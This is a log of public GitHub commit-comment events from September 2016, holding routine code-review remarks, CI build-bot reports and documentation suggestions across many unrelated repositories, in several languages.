{"id":"4521796348","type":"CommitCommentEvent","actor":{"login":"rhafer"},"repo":{"name":"dirkmueller/crowbar-core"},"payload":{"comment":{"id":18912211,"position":27,"line":104,"path":"chef/cookbooks/provisioner/recipes/setup_base_images.rb","commit_id":"7ffec46375a7af1f05b2a5fd62e7450b61486ee6","created_at":"2016-09-06T14:50:29Z","updated_at":"2016-09-06T14:50:29Z","body":"Shouldn't we just do the each loop on ```discovery_arches``` instead of doing it on ```node[:provisioner][:discovery_arches]``` + that weird ```next unless``` ?"}},"created_at":"2016-09-06T14:50:29Z"}
{"id":"4521796770","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18912213,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T14:50:32Z","updated_at":"2016-09-06T14:50:32Z","body":"Noted, as far as the `for in` comment, wouldn't Object.keys() suffer the same performance impact with increasing size? They both need to collect the keys, a linear operation I'm assuming."}},"created_at":"2016-09-06T14:50:32Z"}
{"id":"4521796803","type":"CommitCommentEvent","actor":{"login":"tehhobbit"},"repo":{"name":"StefanLindblom/pyfg"},"payload":{"comment":{"id":18912214,"position":43,"line":370,"path":"pyFG/forticonfig.py","commit_id":"3a5da87c77f87de25148ee72b97db84fe9db300b","created_at":"2016-09-06T14:50:32Z","updated_at":"2016-09-06T14:50:32Z","body":"The elif here will never match  since the first if always matches "}},"created_at":"2016-09-06T14:50:32Z"}
{"id":"4521805326","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":18912232,"position":4,"line":14,"path":"src/libYARP_dev/src/modules/FrameTransformServer/FrameTransformServer.cpp","commit_id":"fd3cbc2a08aad94894b65b82af7bb80ce03a412b","created_at":"2016-09-06T14:51:50Z","updated_at":"2016-09-06T14:51:50Z","body":"Hi @aerydna \r\n\r\nHere I'd rather include the C++ counterpart (pre-compiled header):\r\n```cpp\r\n#include <cstdlib>\r\n```\r\n\r\nIt is 1-to-1 compatible with `stdlib.h` with the exception that its functions are under the **`std`** namespace."}},"created_at":"2016-09-06T14:51:50Z"}
{"id":"4521805835","type":"CommitCommentEvent","actor":{"login":"fukano-ren"},"repo":{"name":"fukano-ren/ToDoList"},"payload":{"comment":{"id":18912236,"position":null,"line":null,"path":null,"commit_id":"e741b659dae711e0d86dcd0d4a0acbb4a7780185","created_at":"2016-09-06T14:51:55Z","updated_at":"2016-09-06T14:51:55Z","body":"https://polar-ravine-99535.herokuapp.com/tasks\r\nこっちです！！！"}},"created_at":"2016-09-06T14:51:55Z"}
{"id":"4521807243","type":"CommitCommentEvent","actor":{"login":"kwketh"},"repo":{"name":"RonnyFenrich/JTSImageViewController"},"payload":{"comment":{"id":18912239,"position":null,"line":null,"path":null,"commit_id":"a70589ee8837a44a59300bdecbf28bd1158c8bd7","created_at":"2016-09-06T14:52:11Z","updated_at":"2016-09-06T14:52:11Z","body":":+1: forked"}},"created_at":"2016-09-06T14:52:11Z"}
{"id":"4521812870","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"pdep-utn/mumuki-guia-objetos-herencia"},"payload":{"comment":{"id":18912247,"position":1,"line":1,"path":"corollary.md","commit_id":"9a2657049758cacf022b94e8a98f0e5f1b702dd8","created_at":"2016-09-06T14:53:00Z","updated_at":"2016-09-06T14:53:00Z","body":"@gcrespi @JuanchiRios lo mismo acá: no utilicen títulos. \r\n\r\nAdemás, traten de además de utilizar esta sección no sólo como resumen de lo visto, sino un gancho a lo que viene, que puede ser algo tan sencillo cómo \"Pero no todo está dicho, queda mucho por ver, acompañanos\", o una mínima mención al tema siguiente, o simplemente un recordatorio de que ahora hay que practicar. "}},"created_at":"2016-09-06T14:53:00Z"}
{"id":"4521816147","type":"CommitCommentEvent","actor":{"login":"mjtko"},"repo":{"name":"alces-software/packager-base"},"payload":{"comment":{"id":18912258,"position":2,"line":1,"path":"apps/hpl/2.1/hpl-8proc.sh.md","commit_id":"f321cca53fdbe80e865bb2f9e1206d36bdc63cd4","created_at":"2016-09-06T14:53:31Z","updated_at":"2016-09-06T14:53:31Z","body":"This should be `hpl-8proc` now. :)"}},"created_at":"2016-09-06T14:53:31Z"}
{"id":"4521817083","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18912259,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T14:53:40Z","updated_at":"2016-09-06T14:53:40Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-06T14:53:40Z"}
{"id":"4521819900","type":"CommitCommentEvent","actor":{"login":"TomWarren"},"repo":{"name":"Door43/ulb-en"},"payload":{"comment":{"id":18912261,"position":null,"line":null,"path":null,"commit_id":"27a5243d9358e0cbbd1a12350a388cb35a4af71c","created_at":"2016-09-06T14:54:03Z","updated_at":"2016-09-06T14:54:03Z","body":"Henry, put an extra space after a period, and resubmit and then sync. \r\nThis has worked for me. \r\nTom "}},"created_at":"2016-09-06T14:54:03Z"}
{"id":"4521819929","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":18912262,"position":5,"line":98,"path":"src/avkit.cs","commit_id":"50b81e2f218c43070c841eea45dca764aa4fd9fb","created_at":"2016-09-06T14:54:03Z","updated_at":"2016-09-06T14:54:03Z","body":"This is wrong. The type is available in tvos 9.0"}},"created_at":"2016-09-06T14:54:03Z"}
{"id":"4521820184","type":"CommitCommentEvent","actor":{"login":"RAttab"},"repo":{"name":"tokenrove/extrospect-beam"},"payload":{"comment":{"id":18912265,"position":43,"line":43,"path":"README.md","commit_id":"d6bc829bccd5768e99e58119f424b83559cda240","created_at":"2016-09-06T14:54:06Z","updated_at":"2016-09-06T14:54:06Z","body":"Additional dependencies that I needed to finish the build:\r\n* liblzma\r\n* gawk\r\n* bison\r\n* flex\r\n* meson 1.33.0+\r\n* ninja 1.5.1 or 1.6.0+"}},"created_at":"2016-09-06T14:54:06Z"}
{"id":"4521821480","type":"CommitCommentEvent","actor":{"login":"mgonzales71"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18912271,"position":null,"line":null,"path":null,"commit_id":"ed00cd660dbbd40cb678b5b3ddfce569bf31bb85","created_at":"2016-09-06T14:54:18Z","updated_at":"2016-09-06T14:54:18Z","body":"Might I suggest a few more?\r\n\r\nJust did a quick grep of a few ffmpeg/curl internet stream logs I had backed up for headers that I didn't see included here:\r\n\r\nIcy-MetaData:\r\nETag:\r\nStrict-Transport-Security:\r\nX-Frame-Options:\r\nAccept-Ranges:\r\nContent-Range:\r\n\r\nI am sure more will come up in due time :grinning: \r\n\r\nThanks for all your hard work folks! :+1: \r\n\r\nM"}},"created_at":"2016-09-06T14:54:18Z"}
{"id":"4521822381","type":"CommitCommentEvent","actor":{"login":"Petto95"},"repo":{"name":"Petto95/Calculadora"},"payload":{"comment":{"id":18912275,"position":6,"line":5,"path":"README.md","commit_id":"8325549f79fd4603e54180496b71040a12ab41a6","created_at":"2016-09-06T14:54:26Z","updated_at":"2016-09-06T14:54:26Z","body":"Calculadora stands for Calculator !"}},"created_at":"2016-09-06T14:54:26Z"}
{"id":"4521822893","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18912277,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T14:54:31Z","updated_at":"2016-09-06T14:54:31Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T14:54:31Z"}
{"id":"4521825780","type":"CommitCommentEvent","actor":{"login":"Petto95"},"repo":{"name":"Petto95/Calculadora"},"payload":{"comment":{"id":18912285,"position":6,"line":5,"path":"README.md","commit_id":"8325549f79fd4603e54180496b71040a12ab41a6","created_at":"2016-09-06T14:54:57Z","updated_at":"2016-09-06T14:54:57Z","body":"// small correction"}},"created_at":"2016-09-06T14:54:57Z"}
{"id":"4521826523","type":"CommitCommentEvent","actor":{"login":"mjtko"},"repo":{"name":"alces-software/packager-base"},"payload":{"comment":{"id":18912287,"position":18,"line":25,"path":"apps/hpl/2.1/hpl-8proc.sh.md","commit_id":"f321cca53fdbe80e865bb2f9e1206d36bdc63cd4","created_at":"2016-09-06T14:55:04Z","updated_at":"2016-09-06T14:55:04Z","body":"I'm happy for this section to exist -- the copy in here is great!  My earlier comment was only about the `.sh` section above.  I'd suggest we reinstate a `## FILES` section title and this subsection for `hpl-8proc.alces.dat`."}},"created_at":"2016-09-06T14:55:04Z"}
{"id":"4521831299","type":"CommitCommentEvent","actor":{"login":"TimBuckley"},"repo":{"name":"Danielbook/kulan2016"},"payload":{"comment":{"id":18912303,"position":15,"line":30,"path":"dev/js/reducers/reducer-bookingData.js","commit_id":"5c42c2bf092770f4235832667f7f28f8e4bc100d","created_at":"2016-09-06T14:55:49Z","updated_at":"2016-09-06T14:55:49Z","body":"This can just be:\r\n\r\n```\r\ndefault:\r\n  return state;\r\n```"}},"created_at":"2016-09-06T14:55:49Z"}
{"id":"4521832970","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18912308,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T14:56:05Z","updated_at":"2016-09-06T14:56:05Z","body":"No, Object.keys() does not traverse the protoype chain. First line of https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/keys"}},"created_at":"2016-09-06T14:56:05Z"}
{"id":"4521834340","type":"CommitCommentEvent","actor":{"login":"jturney"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18912314,"position":24,"line":47,"path":"psi4/src/psi4/libfilesystem/path.cc","commit_id":"46e3f8a1efa2e503a650a9183365a400ecc1e569","created_at":"2016-09-06T14:56:19Z","updated_at":"2016-09-06T14:56:19Z","body":"Wow, yeah. I'm heading to a lecture right now. Please make any changes that are needed!"}},"created_at":"2016-09-06T14:56:19Z"}
{"id":"4521836816","type":"CommitCommentEvent","actor":{"login":"P3pp3rF1y"},"repo":{"name":"P3pp3rF1y/Reliquary"},"payload":{"comment":{"id":18912320,"position":null,"line":null,"path":null,"commit_id":"69209649ebcee7a6862cba6d57c730cab22932aa","created_at":"2016-09-06T14:56:39Z","updated_at":"2016-09-06T14:56:39Z","body":"This should hopefully fix or limit to absolute minimum issues in #151 #148 #137 #134 and #129 "}},"created_at":"2016-09-06T14:56:39Z"}
{"id":"4521838005","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912325,"position":14,"line":14,"path":"docs/source/overview.rst","commit_id":"55fc693f5984674aea0d000fce92cae5459c57af","created_at":"2016-09-06T14:56:50Z","updated_at":"2016-09-06T14:56:50Z","body":"Need to add details of file system carriage mechanism option too. I think that's enabled in simple producer"}},"created_at":"2016-09-06T14:56:50Z"}
{"id":"4521838698","type":"CommitCommentEvent","actor":{"login":"alexander-yakushev"},"repo":{"name":"nathanmarz/specter"},"payload":{"comment":{"id":18912329,"position":70,"line":166,"path":"scripts/benchmarks.clj","commit_id":"d0331c9afe8360b610a6b7764c706e738494e3ea","created_at":"2016-09-06T14:56:56Z","updated_at":"2016-09-06T14:56:56Z","body":"Could you please tell the difference between this line and the previous one? Where the difference in execution time comes from?\r\n\r\n```clojure\r\n 83.723 \t\t 1.00 \t\t (into [] xf data)\r\n 148.40 \t\t 1.77 \t\t (into [] (comp (map :a) (filter even?)) data)\r\n```"}},"created_at":"2016-09-06T14:56:56Z"}
{"id":"4521842803","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912339,"position":18,"line":18,"path":"docs/source/overview.rst","commit_id":"55fc693f5984674aea0d000fce92cae5459c57af","created_at":"2016-09-06T14:57:34Z","updated_at":"2016-09-06T14:57:34Z","body":"Worth mentioning that it's a web page that needs to connect to either a user input consumer or a user input forwarder.\r\n\r\nTypo in the word \"instruction\"."}},"created_at":"2016-09-06T14:57:34Z"}
{"id":"4521844688","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18912344,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T14:57:50Z","updated_at":"2016-09-06T14:57:50Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2359 of 2366 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T14:57:50Z"}
{"id":"4521844911","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18912346,"position":null,"line":null,"path":null,"commit_id":"803752896b6143480de6e8bc21ea891446edac39","created_at":"2016-09-06T14:57:53Z","updated_at":"2016-09-06T14:57:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 926](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12702&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests passed: 125, ignored: 3; compilation error: Scala compiler in Test (new) Build time: 00:09:21"}},"created_at":"2016-09-06T14:57:53Z"}
{"id":"4521847197","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"pdep-utn/mumuki-guia-objetos-herencia"},"payload":{"comment":{"id":18912352,"position":1,"line":1,"path":"00001_Clases/description.md","commit_id":"5251413ef8ad00d59dccb74ff7926e7a129a40cc","created_at":"2016-09-06T14:58:15Z","updated_at":"2016-09-06T14:58:15Z","body":"@JuanchiRios @gcrespi @mmatos un tip: como éste es el primer ejercicio, suma suavizar el arranque: \"Para empezar, queremos saber....\" o \"Para combatir a la nación del fuego :fire: necesitamos saber si....\", etc\r\n\r\nPor otro lado, cuando hagan referencias a código utilicen simplemente tildes francesas en lugar de negritas, por ejemplo: \r\n\r\n...si un maestro agua `esGroso`, esto sucede...\r\n\r\nPor último, la consigna final escríbanla utilizando `>`: \r\n\r\n> Declará la clase `MaestroAgua` con un constructor que reciba su habilidad y los métodos `esGroso` y `poder`"}},"created_at":"2016-09-06T14:58:15Z"}
{"id":"4521847334","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18912353,"position":9,"line":1743,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:58:16Z","updated_at":"2016-09-06T14:58:16Z","body":"Plumbed context from the callers of CheckConsistency."}},"created_at":"2016-09-06T14:58:16Z"}
{"id":"4521849683","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18912361,"position":89,"line":1805,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:58:36Z","updated_at":"2016-09-06T14:58:36Z","body":"Done."}},"created_at":"2016-09-06T14:58:36Z"}
{"id":"4521850699","type":"CommitCommentEvent","actor":{"login":"eisenstatdavid"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18912363,"position":112,"line":1828,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-06T14:58:45Z","updated_at":"2016-09-06T14:58:45Z","body":"Done."}},"created_at":"2016-09-06T14:58:45Z"}
{"id":"4521852099","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18912365,"position":null,"line":null,"path":null,"commit_id":"9dd18fad3cdeaf52bf6aff3ae252a41ecffec007","created_at":"2016-09-06T14:58:57Z","updated_at":"2016-09-06T14:58:57Z","body":"Ufa! Deixaste passar esta... Estava a ver pensaste muito lol"}},"created_at":"2016-09-06T14:58:57Z"}
{"id":"4521852550","type":"CommitCommentEvent","actor":{"login":"AdamWill"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18912368,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-06T14:59:01Z","updated_at":"2016-09-06T14:59:01Z","body":"it's not harmless, it makes a mess all over the logs. :)"}},"created_at":"2016-09-06T14:59:01Z"}
{"id":"4521855199","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912374,"position":30,"line":30,"path":"docs/source/overview.rst","commit_id":"8e122ebdb0cc2bf518812c615e58da7fc6be072b","created_at":"2016-09-06T14:59:26Z","updated_at":"2016-09-06T14:59:26Z","body":"It's similar to the simple _consumer_ not the simple producer. It provides a WebSocket connection point for the User Input Producer. Running this is equivalent to running the user input forwarder and the simple consumer. It's not essential to start this script before connecting the user input producer - it's either this or the user input forwarder but not both."}},"created_at":"2016-09-06T14:59:26Z"}
{"id":"4521857232","type":"CommitCommentEvent","actor":{"login":"kvas-damian"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18912396,"position":null,"line":null,"path":null,"commit_id":"f9327f6baeac31d1a1e2485f8791f134bb9ada81","created_at":"2016-09-06T14:59:44Z","updated_at":"2016-09-06T14:59:44Z","body":"Ping @nandy-andy @fraszczakszymon "}},"created_at":"2016-09-06T14:59:44Z"}
{"id":"4521857775","type":"CommitCommentEvent","actor":{"login":"overlookmotel"},"repo":{"name":"Jeff-Lewis/cls-bluebird-jl"},"payload":{"comment":{"id":18912399,"position":5,"line":11,"path":"package.json","commit_id":"f04e9e4fe83ca50a31e374cc45df1f4db96976f3","created_at":"2016-09-06T14:59:48Z","updated_at":"2016-09-06T14:59:48Z","body":"I *think* if you remove the quotes it doesn't run all the tests. Without quotes, bash does the expansion of `**` and it gets it wrong. With quotes, expansion is done by mocha which gets it right."}},"created_at":"2016-09-06T14:59:48Z"}
{"id":"4521858245","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18912404,"position":null,"line":null,"path":null,"commit_id":"1f648d513661ede410b162ac99e6b19d461e127c","created_at":"2016-09-06T14:59:52Z","updated_at":"2016-09-06T14:59:52Z","body":"Great! ... I guess it will take a day for MELPA to be updated."}},"created_at":"2016-09-06T14:59:52Z"}
{"id":"4521858414","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18912405,"position":null,"line":null,"path":null,"commit_id":"72e4fac28d59ed5db3e81efe01ccbcc3a8311dbf","created_at":"2016-09-06T14:59:53Z","updated_at":"2016-09-06T14:59:53Z","body":"Thanks! 👍 "}},"created_at":"2016-09-06T14:59:53Z"}
{"id":"4521858879","type":"CommitCommentEvent","actor":{"login":"jstnbrgnd"},"repo":{"name":"efournival/miogo"},"payload":{"comment":{"id":18912413,"position":null,"line":null,"path":null,"commit_id":"4bbb0802abe2e0b92972b7cac968e8c339d8d321","created_at":"2016-09-06T14:59:58Z","updated_at":"2016-09-06T14:59:58Z","body":"ça pue le seum"}},"created_at":"2016-09-06T14:59:58Z"}
{"id":"4521860900","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912435,"position":35,"line":34,"path":"docs/source/overview.rst","commit_id":"8e122ebdb0cc2bf518812c615e58da7fc6be072b","created_at":"2016-09-06T15:00:21Z","updated_at":"2016-09-06T15:00:21Z","body":"It can also be used to be an incoming connection point for WebSocket connections from other sources than the UIP - it doesn't care! "}},"created_at":"2016-09-06T15:00:21Z"}
{"id":"4521862274","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912456,"position":17,"line":18,"path":"docs/source/overview.rst","commit_id":"8e122ebdb0cc2bf518812c615e58da7fc6be072b","created_at":"2016-09-06T15:00:34Z","updated_at":"2016-09-06T15:00:34Z","body":"Just seen this - please discard previous comment."}},"created_at":"2016-09-06T15:00:34Z"}
{"id":"4521866333","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18912487,"position":14,"line":16,"path":"docs/source/overview.rst","commit_id":"8e122ebdb0cc2bf518812c615e58da7fc6be072b","created_at":"2016-09-06T15:01:05Z","updated_at":"2016-09-06T15:01:05Z","body":"Worth saying it supports two carriage mechs, and WebSocket is the default."}},"created_at":"2016-09-06T15:01:05Z"}
{"id":"4521867708","type":"CommitCommentEvent","actor":{"login":"alexander-yakushev"},"repo":{"name":"nathanmarz/specter"},"payload":{"comment":{"id":18912504,"position":70,"line":166,"path":"scripts/benchmarks.clj","commit_id":"d0331c9afe8360b610a6b7764c706e738494e3ea","created_at":"2016-09-06T15:01:18Z","updated_at":"2016-09-06T15:01:18Z","body":"Ah, get it now, that's the time wasted constructing lambda every time."}},"created_at":"2016-09-06T15:01:18Z"}
{"id":"4521868918","type":"CommitCommentEvent","actor":{"login":"andreak"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18912512,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T15:01:28Z","updated_at":"2016-09-06T15:01:28Z","body":"Ok, I see.\r\nI'm sad to see that indexed FTS(partial-match, which we always use) + ORDER BY <timestamp> won't be available to us because of this in 9.6 either. Although I see that there's nothing you can do about it..."}},"created_at":"2016-09-06T15:01:28Z"}
{"id":"4521874011","type":"CommitCommentEvent","actor":{"login":"lucaa"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18912601,"position":253,"line":998,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T15:02:14Z","updated_at":"2016-09-06T15:02:14Z","body":"I checked the solution you applied, and I still have a remark about the logic of the solution.\r\nThe idea is that copyContentsToNewVersion is also creating documents if they don't exist, in which case it expects toDocument to be an \"empty\" (no content, no objects, no metadata set, etc) , new (isNew() == true) document .\r\n\r\nThe fact that the toDocument() is created as a copy of the fromDocument() means that the logic of merging source with target will be \"broken\", as it will merge source with source, and I think it only works fine in the case of documents without objects. The logic of merge that doesn't apply is something like this: each document (from and to) keep their own rights and comments (and, as I said, potentially other metadata - what we call the \"irrelevant metadata\"). Or, if the toDocument to be merged is created as an identical copy of the source, the target keeping its own rights and comments means that the target is preserving the source rights and comments with which it was created. As I said, in the standard case it will work because all the elements we consider irrelevant by default are objects and the only case in which you create the target as a duplicate is for the document not being the default document (thus not containing the objects).\r\nIf there is an alternative I would prefer to not pre-duplicate and just let copyContentsToNewVersion do its job, but if there is no way to create a new, empty document with a specific language, leave it like this, it would not be the first piece of code that is not perfect in the publication workflow..."}},"created_at":"2016-09-06T15:02:14Z"}
{"id":"4521875386","type":"CommitCommentEvent","actor":{"login":"jstnbrgnd"},"repo":{"name":"efournival/miogo"},"payload":{"comment":{"id":18912627,"position":null,"line":null,"path":null,"commit_id":"4bbb0802abe2e0b92972b7cac968e8c339d8d321","created_at":"2016-09-06T15:02:26Z","updated_at":"2016-09-06T15:02:26Z","body":"fixed by ouam for ouam"}},"created_at":"2016-09-06T15:02:26Z"}
{"id":"4521876520","type":"CommitCommentEvent","actor":{"login":"jstnbrgnd"},"repo":{"name":"efournival/miogo"},"payload":{"comment":{"id":18912654,"position":null,"line":null,"path":null,"commit_id":"4bbb0802abe2e0b92972b7cac968e8c339d8d321","created_at":"2016-09-06T15:02:35Z","updated_at":"2016-09-06T15:02:35Z","body":"vive la liberté"}},"created_at":"2016-09-06T15:02:35Z"}
{"id":"4521878021","type":"CommitCommentEvent","actor":{"login":"vshatalov"},"repo":{"name":"ybogdanov/history-timeline"},"payload":{"comment":{"id":18912698,"position":null,"line":null,"path":null,"commit_id":"d471eaeae7729e5a123dd9f958830e6feea41a81","created_at":"2016-09-06T15:02:47Z","updated_at":"2016-09-06T15:02:47Z","body":"Well done! \r\nThe work is very interesting to me because I participate in developing close problems and we've discussed the same work that you finished. \r\nhttps://www.facebook.com/notes/vladimir-shatalov/hidden-revolution-of-human-priorities-an-analysis-of-biographical-data-from-wiki/902428483171850 \r\nhttps://www.facebook.com/notes/vladimir-shatalov/quantitative-analysis-of-historical-data-extracted-from-wikipedia/1062089660539064 \r\nWelcome to discussions! :-)"}},"created_at":"2016-09-06T15:02:47Z"}
{"id":"4521878838","type":"CommitCommentEvent","actor":{"login":"aengelberg"},"repo":{"name":"nathanmarz/specter"},"payload":{"comment":{"id":18912729,"position":70,"line":166,"path":"scripts/benchmarks.clj","commit_id":"d0331c9afe8360b610a6b7764c706e738494e3ea","created_at":"2016-09-06T15:02:55Z","updated_at":"2016-09-06T15:02:55Z","body":"In the slower example, the time taken to construct `(comp (map :a) (filter even?))` is included in the operation being benchmarked. In the faster example, the transducer is already defined and ready to go, so it takes less time."}},"created_at":"2016-09-06T15:02:55Z"}
{"id":"4521884231","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18912824,"position":null,"line":null,"path":null,"commit_id":"e03e46b2a31099b490b38c1b16160d495444d5ce","created_at":"2016-09-06T15:03:45Z","updated_at":"2016-09-06T15:03:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;0CGi9Xky&#x2F;5-1-add-helpers-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (1) Add &#x60;helpers&#x60; group</a>"}},"created_at":"2016-09-06T15:03:45Z"}
{"id":"4521888133","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18912843,"position":null,"line":null,"path":null,"commit_id":"ed00cd660dbbd40cb678b5b3ddfce569bf31bb85","created_at":"2016-09-06T15:04:23Z","updated_at":"2016-09-06T15:04:23Z","body":"> The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a frame, iframe or object\"\r\n\r\nPlease elaborate why you think this is useful"}},"created_at":"2016-09-06T15:04:23Z"}
{"id":"4521896049","type":"CommitCommentEvent","actor":{"login":"dericed"},"repo":{"name":"amiaopensource/vrecord"},"payload":{"comment":{"id":18912863,"position":null,"line":null,"path":null,"commit_id":"dedee723f3f36bc98a8c75caab1a6142fe272fb5","created_at":"2016-09-06T15:05:38Z","updated_at":"2016-09-06T15:05:38Z","body":"I have an early attempt at transfer metadata in Matroska at https://archive.org/download/MatroskaSampleWithEmbeddedPreservationMetadata/pres_metadata_sample_20110608.mkv."}},"created_at":"2016-09-06T15:05:38Z"}
